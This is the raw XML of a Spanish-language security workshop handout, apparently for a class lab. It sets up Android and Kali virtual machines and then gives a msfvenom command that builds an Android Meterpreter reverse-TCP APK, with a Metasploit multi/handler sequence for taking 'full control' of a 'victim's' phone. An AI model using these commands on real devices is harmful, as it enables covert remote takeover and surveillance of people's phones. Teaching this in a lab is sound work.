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B3" w:rsidRDefault="00A666E6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Taller Seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">En la máquina  3-06-02 con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>IP :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.133.1.106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la carpeta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>imagenes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> no borrar queda la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">Luego de tener la imagen, deben crear una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>maquina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtual, recomendado en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> con las </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>siguentes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caracteristicas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">Nombre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>Tipo BSD</w:t>
      </w:r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 xml:space="preserve">Versión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>FreeBSD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64bit</w:t>
      </w:r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>Memoria RAM 2048</w:t>
      </w:r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>Disco de 20GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">Deben instalar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>kali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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>virtualb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> también y dejan las tarjetas en adaptador puente para que ambas </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>reciba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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6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luego</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6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en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Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> crear:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:rPr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>1. Abrimos nuestro sistema operativo de seguridad preferid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">o, luego la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>aplicación</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">y escribimos el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comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>"msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> R &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>name.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr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  <w:lang w:eastAsia="es-CO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772400" cy="35750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9B3" w:rsidRDefault="009179B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:spacing w:after="283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>El comando se divide en varias partes que son:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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msfvenom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-&gt; Es la aplicación donde desarrollamos el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payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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>-p -&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estamos indicando que vamos a realizar un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payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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android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>/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meterpreter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>/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reverse_tcp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-&gt; Es el tipo de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payload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que necesitamos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">LHOST -&gt; Es la IP que usará la aplicación para comunicarse con nosotros.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Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">LPORT -&gt; Es el puerto donde se conectará nuestra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>aplicación. Si la red es interna yo uso el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>puerto 8080 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>pero si es en una red exterior deberemos abrir el puerto que deseemos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing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lastRenderedPageBreak/>
        <w:t xml:space="preserve">R &gt;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name.apk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-&gt; Es la ruta donde almacenaremos el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payload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y con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que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nombre. La ruta por defecto (cuando ponemos solo el nombre, es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">la carpeta personal o la de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root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>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente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 xml:space="preserve">2. Una vez hayamos introducido el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payload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en el móvil de nuestra víctima ponemos los siguientes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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msfconsole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-&gt;Iniciamos la aplicación de monitoreo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">use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multi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>/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handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">set PAYLOAD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android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>/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meterpreter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>/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reverse_tcp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-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicamos cual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payload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queremos detectar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">set LHOST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xxxx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-&gt; Indicamos la IP asignada al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payload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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="336" w:lineRule="auto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 xml:space="preserve">set LPORT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xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Indicamos el puerto asignado al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="336" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;Geneva;sans-serif" w:hAnsi="Verdana;Geneva;sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Una vez llegados a este punto deberemos tener control total sobre el teléfono.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="00A666E6">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3"/>
    <w:p w:rsidR="009179B3" w:rsidRDefault="009179B3"/>
    <w:sectPr w:rsidR="009179B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Verdana;Genev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D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0844769A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2D9852F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="864478C0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76DF2965"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0E059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B3"/>
    <w:rsid w:val="009179B3"/>
    <w:rsid w:val="00A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Noto Sans Devanagar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Noto Sans Devanagar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hrodrigs</dc:creator>
  <cp:lastModifiedBy>hrodrigs</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-09T17:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-09T17:21:00Z</dcterms:modified>
  <dc:language>es-CO</dc:language>
</cp:coreProperties>
</file>